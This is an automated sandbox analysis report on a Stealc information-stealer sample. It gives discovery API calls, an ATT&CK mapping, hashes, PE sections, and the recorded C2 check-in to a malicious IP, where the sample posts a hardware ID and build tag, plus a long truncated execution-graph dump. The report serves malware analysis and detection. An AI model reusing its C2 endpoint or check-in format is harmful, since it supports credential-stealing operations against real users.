                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D345C0 VirtualProtect ?,00000004,00000100,00000000 0_2_00D345C0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D49860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00D49860
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D49750 mov eax, dword ptr fs:[00000030h] 0_2_00D49750
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D478E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA, 0_2_00D478E0
                Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match File source: Process Memory Space: file.exe PID: 6928, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D49600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00D49600
                Source: file.exe, file.exe, 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Program Manager
                Source: C:\Users\user\Desktop\file.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00D47B90
                Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D47980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA, 0_2_00D47980
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D47850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_00D47850
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D47A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, 0_2_00D47A30

                Stealing of Sensitive Information

                Source: Yara match File source: 0.2.file.exe.d30000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000000.00000002.1712532051.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000003.1672169308.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: file.exe PID: 6928, type: MEMORYSTR
                Source: Yara match File source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
Source: Yara match | File source: 0.2.file.exe.d30000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1712532051.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1672169308.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6928, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
ATT&CK matrix, one tactic per line (leading digits are the signature counts shown in the original matrix cells):

Reconnaissance: Gather Victim Identity Information | Credentials | Email Addresses | Employee Names | Gather Victim Network Information | Domain Properties | DNS | Network Trust Dependencies
Resource Development: Acquire Infrastructure | Domains | DNS Server | Virtual Private Server | Server | Botnet | Web Services | Serverless
Initial Access: Valid Accounts | Default Accounts | Domain Accounts | Local Accounts | Cloud Accounts | Replication Through Removable Media | External Remote Services | Drive-by Compromise
Execution: 2 Command and Scripting Interpreter | 11 Native API | At | Cron | Launchd | Scheduled Task | Systemd Timers | Container Orchestration Job
Persistence: 1 DLL Side-Loading | Boot or Logon Initialization Scripts | Logon Script (Windows) | Login Hook | Network Logon Script | RC Scripts | Startup Items | Scheduled Task/Job
Privilege Escalation: 11 Process Injection | 1 DLL Side-Loading | Logon Script (Windows) | Login Hook | Network Logon Script | RC Scripts | Startup Items | Scheduled Task/Job
Defense Evasion: 1 Masquerading | 33 Virtualization/Sandbox Evasion | 11 Disable or Modify Tools | 11 Process Injection | 1 Deobfuscate/Decode Files or Information | 4 Obfuscated Files or Information | 12 Software Packing | 1 DLL Side-Loading
Credential Access: OS Credential Dumping | LSASS Memory | Security Account Manager | NTDS | LSA Secrets | Cached Domain Credentials | DCSync | Proc Filesystem
Discovery: 2 System Time Discovery | 641 Security Software Discovery | 33 Virtualization/Sandbox Evasion | 13 Process Discovery | 1 Account Discovery | 1 System Owner/User Discovery | 1 File and Directory Discovery | 324 System Information Discovery
Lateral Movement: Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares | Distributed Component Object Model | SSH | VNC | Windows Remote Management | Cloud Services
Collection: 1 Archive Collected Data | Data from Removable Media | Data from Network Shared Drive | Input Capture | Keylogging | GUI Input Capture | Web Portal Capture | Credential API Hooking
Command and Control: 2 Encrypted Channel | 2 Ingress Tool Transfer | 2 Non-Application Layer Protocol | 12 Application Layer Protocol | Fallback Channels | Multiband Communication | Commonly Used Port | Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration | Traffic Duplication | Scheduled Transfer | Data Transfer Size Limits | Exfiltration Over C2 Channel | Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features | Network Denial of Service | Data Encrypted for Impact | Data Destruction | Data Encrypted for Impact | Service Stop | Inhibit System Recovery | Defacement

Source | Detection | Scanner | Label
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://185.215.113.37/ | 100% | URL Reputation | malware
http://185.215.113.37 | 100% | URL Reputation | malware
http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
http://185.215.113.37/e2b1563c6670f193.phps | 17% | Virustotal |
http://185.215.113.37/U | 17% | Virustotal |
http://185.215.113.37/e2b1563c6670f193.phpC | 17% | Virustotal |
No contacted domains info

Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/ | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/U | file.exe, 00000000.00000002.1712532051.0000000000B37000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37 | file.exe, 00000000.00000002.1712532051.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.phpC | file.exe, 00000000.00000002.1712532051.0000000000B37000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phps | file.exe, 00000000.00000002.1712532051.0000000000B37000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1523113
                Start date and time:2024-10-01 05:32:08 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 2m 37s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:1
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:file.exe
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@1/0@0/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 80%
                • Number of executed functions: 19
                • Number of non-executed functions: 81
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Stop behavior analysis, all processes terminated
                • Report size getting too big, too many NtQueryValueKey calls found.
                No simulations
Match | Associated Sample Name | Detection | Threat Name | Context
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
No context
Match | Associated Sample Name | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
No context
No context
                No created / dropped files found
                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):7.948540455118834
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.96%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:file.exe
                File size:1'820'672 bytes
                MD5:fa42e6e289aa71b35af21bb42409f81f
                SHA1:e44dcb353f84af8e6c81ebb6654945898b7fbedd
                SHA256:c17afe930719ca7861323d6e6fd2a8c59db8db0bce6ae487078d842105a830d7
                SHA512:ffbf8c9e4e7e25c388b69a6d8ad4233bd720400d9c482093999b36b642800457494796620bcf310e907b90d5d1d2a6f5036ceb248c1841dfb5fdfefc9b2dd328
                SSDEEP:24576:m0NcbFSaM1s2gtdunZBw3h88o1GUe0ZzxwSUU/qJNeKOPzcObLJtuXBpBCZjPwLV:m0GhSaMG1cCTeNURJGzbuR5iKcK
                TLSH:E585339B569A6CF7CE6148BD18EED3C998B12D85AE540CEC0D0F216D3E1B259B38CF14
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                Icon Hash:90cececece8e8eb0
                Entrypoint:0xa8d000
                Entrypoint Section:.taggant
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:5
                OS Version Minor:1
                File Version Major:5
                File Version Minor:1
                Subsystem Version Major:5
                Subsystem Version Minor:1
                Import Hash:2eabe9054cad5152567f0699947a2c5b
                Instruction
                jmp 00007F43F0C1EB6Ah
                Programming Language:
                • [C++] VS2010 build 30319
                • [ASM] VS2010 build 30319
                • [ C ] VS2010 build 30319
                • [ C ] VS2008 SP1 build 30729
                • [IMP] VS2008 SP1 build 30729
                • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x25b000 | 0x22800 | 626dfe7cd50764ddb47649f6f4a56da1 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x25e000 | 0x297000 | 0x200 | 8c244ac03762cd8c453ba7a35c7a2cb5 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
eruzhrvr | 0x4f5000 | 0x197000 | 0x196600 | dddfa0f37f404dac01cf7fc402ee27df | False | 0.9949714991541064 | data | 7.953491932636083 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ewcbbuan | 0x68c000 | 0x1000 | 0x400 | c5e8490afea686fc70a1a4215f35510f | False | 0.736328125 | data | 5.908122127099704 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x68d000 | 0x3000 | 0x2200 | 53c5e8057b11600f4f8ee8e21e9477df | False | 0.07364430147058823 | DOS executable (COM) | 0.8146873863285452 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-01T05:33:02.479402+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 1, 2024 05:33:01.512228966 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 1, 2024 05:33:01.517395973 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 1, 2024 05:33:01.517529964 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 1, 2024 05:33:01.517607927 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 1, 2024 05:33:01.522345066 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 1, 2024 05:33:02.238766909 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 1, 2024 05:33:02.238854885 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 1, 2024 05:33:02.240998030 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 1, 2024 05:33:02.245863914 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 1, 2024 05:33:02.479330063 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 1, 2024 05:33:02.479402065 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 1, 2024 05:33:04.726223946 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37

HTTP sessions with 185.215.113.37:
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | 6928 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:33:01.517607927 CEST | 89 | OUT | GET / HTTP/1.1
Host: 185.215.113.37
Connection: Keep-Alive
Cache-Control: no-cache
Oct 1, 2024 05:33:02.238766909 CEST | 203 | IN | HTTP/1.1 200 OK
Date: Tue, 01 Oct 2024 03:33:02 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Oct 1, 2024 05:33:02.240998030 CEST | 412 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----DHCBGDHIEBFHCBFHDHDH
Host: 185.215.113.37
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 44 48 43 42 47 44 48 49 45 42 46 48 43 42 46 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 32 42 36 39 34 34 46 33 37 31 34 34 32 39 33 39 34 34 32 32 30 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 42 47 44 48 49 45 42 46 48 43 42 46 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 42 47 44 48 49 45 42 46 48 43 42 46 48 44 48 44 48 2d 2d 0d 0a
Data Ascii (CRLF line breaks restored from the raw bytes):
------DHCBGDHIEBFHCBFHDHDH
Content-Disposition: form-data; name="hwid"

92B6944F37144293944220
------DHCBGDHIEBFHCBFHDHDH
Content-Disposition: form-data; name="build"

doma
------DHCBGDHIEBFHCBFHDHDH--
Oct 1, 2024 05:33:02.479330063 CEST | 210 | IN | HTTP/1.1 200 OK
Date: Tue, 01 Oct 2024 03:33:02 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s= (base64 of "block")



                Target ID:0
                Start time:23:32:57
                Start date:30/09/2024
                Path:C:\Users\user\Desktop\file.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\file.exe"
                Imagebase:0xd30000
                File size:1'820'672 bytes
                MD5 hash:FA42E6E289AA71B35AF21BB42409F81F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1712532051.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1672169308.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                Reputation:low
                Has exited:true


                  Execution Graph

                  Execution Coverage:9.7%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:10.1%
                  Total number of Nodes:2000
                  Total number of Limit Nodes:24
API calls 13674->13675 13676 d32ca9 13675->13676 13677 d345c0 2 API calls 13676->13677 13678 d32cc2 13677->13678 13679 d345c0 2 API calls 13678->13679 13680 d32cdb 13679->13680 13681 d345c0 2 API calls 13680->13681 13682 d32cf4 13681->13682 13683 d345c0 2 API calls 13682->13683 13684 d32d0d 13683->13684 13685 d345c0 2 API calls 13684->13685 13686 d32d26 13685->13686 13687 d345c0 2 API calls 13686->13687 13688 d32d3f 13687->13688 13689 d345c0 2 API calls 13688->13689 13690 d32d58 13689->13690 13691 d345c0 2 API calls 13690->13691 13692 d32d71 13691->13692 13693 d345c0 2 API calls 13692->13693 13694 d32d8a 13693->13694 13695 d345c0 2 API calls 13694->13695 13696 d32da3 13695->13696 13697 d345c0 2 API calls 13696->13697 13698 d32dbc 13697->13698 13699 d345c0 2 API calls 13698->13699 13700 d32dd5 13699->13700 13701 d345c0 2 API calls 13700->13701 13702 d32dee 13701->13702 13703 d345c0 2 API calls 13702->13703 13704 d32e07 13703->13704 13705 d345c0 2 API calls 13704->13705 13706 d32e20 13705->13706 13707 d345c0 2 API calls 13706->13707 13708 d32e39 13707->13708 13709 d345c0 2 API calls 13708->13709 13710 d32e52 13709->13710 13711 d345c0 2 API calls 13710->13711 13712 d32e6b 13711->13712 13713 d345c0 2 API calls 13712->13713 13714 d32e84 13713->13714 13715 d345c0 2 API calls 13714->13715 13716 d32e9d 13715->13716 13717 d345c0 2 API calls 13716->13717 13718 d32eb6 13717->13718 13719 d345c0 2 API calls 13718->13719 13720 d32ecf 13719->13720 13721 d345c0 2 API calls 13720->13721 13722 d32ee8 13721->13722 13723 d345c0 2 API calls 13722->13723 13724 d32f01 13723->13724 13725 d345c0 2 API calls 13724->13725 13726 d32f1a 13725->13726 13727 d345c0 2 API calls 13726->13727 13728 d32f33 13727->13728 13729 d345c0 2 API calls 13728->13729 13730 d32f4c 13729->13730 13731 d345c0 2 API calls 13730->13731 13732 d32f65 13731->13732 13733 d345c0 2 API calls 13732->13733 13734 d32f7e 13733->13734 13735 d345c0 2 API calls 13734->13735 13736 d32f97 13735->13736 13737 d345c0 2 API calls 
13736->13737 13738 d32fb0 13737->13738 13739 d345c0 2 API calls 13738->13739 13740 d32fc9 13739->13740 13741 d345c0 2 API calls 13740->13741 13742 d32fe2 13741->13742 13743 d345c0 2 API calls 13742->13743 13744 d32ffb 13743->13744 13745 d345c0 2 API calls 13744->13745 13746 d33014 13745->13746 13747 d345c0 2 API calls 13746->13747 13748 d3302d 13747->13748 13749 d345c0 2 API calls 13748->13749 13750 d33046 13749->13750 13751 d345c0 2 API calls 13750->13751 13752 d3305f 13751->13752 13753 d345c0 2 API calls 13752->13753 13754 d33078 13753->13754 13755 d345c0 2 API calls 13754->13755 13756 d33091 13755->13756 13757 d345c0 2 API calls 13756->13757 13758 d330aa 13757->13758 13759 d345c0 2 API calls 13758->13759 13760 d330c3 13759->13760 13761 d345c0 2 API calls 13760->13761 13762 d330dc 13761->13762 13763 d345c0 2 API calls 13762->13763 13764 d330f5 13763->13764 13765 d345c0 2 API calls 13764->13765 13766 d3310e 13765->13766 13767 d345c0 2 API calls 13766->13767 13768 d33127 13767->13768 13769 d345c0 2 API calls 13768->13769 13770 d33140 13769->13770 13771 d345c0 2 API calls 13770->13771 13772 d33159 13771->13772 13773 d345c0 2 API calls 13772->13773 13774 d33172 13773->13774 13775 d345c0 2 API calls 13774->13775 13776 d3318b 13775->13776 13777 d345c0 2 API calls 13776->13777 13778 d331a4 13777->13778 13779 d345c0 2 API calls 13778->13779 13780 d331bd 13779->13780 13781 d345c0 2 API calls 13780->13781 13782 d331d6 13781->13782 13783 d345c0 2 API calls 13782->13783 13784 d331ef 13783->13784 13785 d345c0 2 API calls 13784->13785 13786 d33208 13785->13786 13787 d345c0 2 API calls 13786->13787 13788 d33221 13787->13788 13789 d345c0 2 API calls 13788->13789 13790 d3323a 13789->13790 13791 d345c0 2 API calls 13790->13791 13792 d33253 13791->13792 13793 d345c0 2 API calls 13792->13793 13794 d3326c 13793->13794 13795 d345c0 2 API calls 13794->13795 13796 d33285 13795->13796 13797 d345c0 2 API calls 13796->13797 13798 d3329e 13797->13798 13799 d345c0 2 API calls 13798->13799 
13800 d332b7 13799->13800 13801 d345c0 2 API calls 13800->13801 13802 d332d0 13801->13802 13803 d345c0 2 API calls 13802->13803 13804 d332e9 13803->13804 13805 d345c0 2 API calls 13804->13805 13806 d33302 13805->13806 13807 d345c0 2 API calls 13806->13807 13808 d3331b 13807->13808 13809 d345c0 2 API calls 13808->13809 13810 d33334 13809->13810 13811 d345c0 2 API calls 13810->13811 13812 d3334d 13811->13812 13813 d345c0 2 API calls 13812->13813 13814 d33366 13813->13814 13815 d345c0 2 API calls 13814->13815 13816 d3337f 13815->13816 13817 d345c0 2 API calls 13816->13817 13818 d33398 13817->13818 13819 d345c0 2 API calls 13818->13819 13820 d333b1 13819->13820 13821 d345c0 2 API calls 13820->13821 13822 d333ca 13821->13822 13823 d345c0 2 API calls 13822->13823 13824 d333e3 13823->13824 13825 d345c0 2 API calls 13824->13825 13826 d333fc 13825->13826 13827 d345c0 2 API calls 13826->13827 13828 d33415 13827->13828 13829 d345c0 2 API calls 13828->13829 13830 d3342e 13829->13830 13831 d345c0 2 API calls 13830->13831 13832 d33447 13831->13832 13833 d345c0 2 API calls 13832->13833 13834 d33460 13833->13834 13835 d345c0 2 API calls 13834->13835 13836 d33479 13835->13836 13837 d345c0 2 API calls 13836->13837 13838 d33492 13837->13838 13839 d345c0 2 API calls 13838->13839 13840 d334ab 13839->13840 13841 d345c0 2 API calls 13840->13841 13842 d334c4 13841->13842 13843 d345c0 2 API calls 13842->13843 13844 d334dd 13843->13844 13845 d345c0 2 API calls 13844->13845 13846 d334f6 13845->13846 13847 d345c0 2 API calls 13846->13847 13848 d3350f 13847->13848 13849 d345c0 2 API calls 13848->13849 13850 d33528 13849->13850 13851 d345c0 2 API calls 13850->13851 13852 d33541 13851->13852 13853 d345c0 2 API calls 13852->13853 13854 d3355a 13853->13854 13855 d345c0 2 API calls 13854->13855 13856 d33573 13855->13856 13857 d345c0 2 API calls 13856->13857 13858 d3358c 13857->13858 13859 d345c0 2 API calls 13858->13859 13860 d335a5 13859->13860 13861 d345c0 2 API calls 13860->13861 13862 d335be 
13861->13862 13863 d345c0 2 API calls 13862->13863 13864 d335d7 13863->13864 13865 d345c0 2 API calls 13864->13865 13866 d335f0 13865->13866 13867 d345c0 2 API calls 13866->13867 13868 d33609 13867->13868 13869 d345c0 2 API calls 13868->13869 13870 d33622 13869->13870 13871 d345c0 2 API calls 13870->13871 13872 d3363b 13871->13872 13873 d345c0 2 API calls 13872->13873 13874 d33654 13873->13874 13875 d345c0 2 API calls 13874->13875 13876 d3366d 13875->13876 13877 d345c0 2 API calls 13876->13877 13878 d33686 13877->13878 13879 d345c0 2 API calls 13878->13879 13880 d3369f 13879->13880 13881 d345c0 2 API calls 13880->13881 13882 d336b8 13881->13882 13883 d345c0 2 API calls 13882->13883 13884 d336d1 13883->13884 13885 d345c0 2 API calls 13884->13885 13886 d336ea 13885->13886 13887 d345c0 2 API calls 13886->13887 13888 d33703 13887->13888 13889 d345c0 2 API calls 13888->13889 13890 d3371c 13889->13890 13891 d345c0 2 API calls 13890->13891 13892 d33735 13891->13892 13893 d345c0 2 API calls 13892->13893 13894 d3374e 13893->13894 13895 d345c0 2 API calls 13894->13895 13896 d33767 13895->13896 13897 d345c0 2 API calls 13896->13897 13898 d33780 13897->13898 13899 d345c0 2 API calls 13898->13899 13900 d33799 13899->13900 13901 d345c0 2 API calls 13900->13901 13902 d337b2 13901->13902 13903 d345c0 2 API calls 13902->13903 13904 d337cb 13903->13904 13905 d345c0 2 API calls 13904->13905 13906 d337e4 13905->13906 13907 d345c0 2 API calls 13906->13907 13908 d337fd 13907->13908 13909 d345c0 2 API calls 13908->13909 13910 d33816 13909->13910 13911 d345c0 2 API calls 13910->13911 13912 d3382f 13911->13912 13913 d345c0 2 API calls 13912->13913 13914 d33848 13913->13914 13915 d345c0 2 API calls 13914->13915 13916 d33861 13915->13916 13917 